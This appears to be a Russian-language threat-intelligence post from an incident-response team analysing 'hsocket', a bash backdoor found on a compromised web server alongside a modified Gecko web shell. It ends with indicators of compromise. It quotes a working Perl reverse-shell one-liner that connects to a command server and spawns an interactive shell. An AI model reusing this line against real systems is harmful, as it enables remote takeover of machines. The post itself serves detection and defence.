В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент
hsocket (не путать с gsocket).После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта.
1️⃣
hsocket — бэкдор, имеющий следующий функционал:• запуск интерактивной командной оболочки
• запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter)
• сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов)
• защита файлов от удаления
• установление reverse shell-соединения с управляющим сервером с помощью кода на Perl:
perl -e "use Socket;\$i=\"$hsHOST\";\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM,
getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){
open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('sh -i');};"
• скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas)
2️⃣
hfsm — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы.3️⃣
.hsrc — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов.В рамках данного исследования нам удалось обнаружить статью, написанную на индонезийском языке, в которой было описано данное ВПО.
Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском:
// Fungsi untuk tampilan halaman login
$Warning = "### ⚠️Info!! Terdekteksi Aktivitas Dari";
Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода:
//------------------GECKO SHELL, RECODED BY AYANA--------------------//
<!-- Gecko Folder File Manager -->
IoC:
hsocket.io
/tmp/hs-data/
#ir #dfir #detect #ioc #malware
@ptescalator
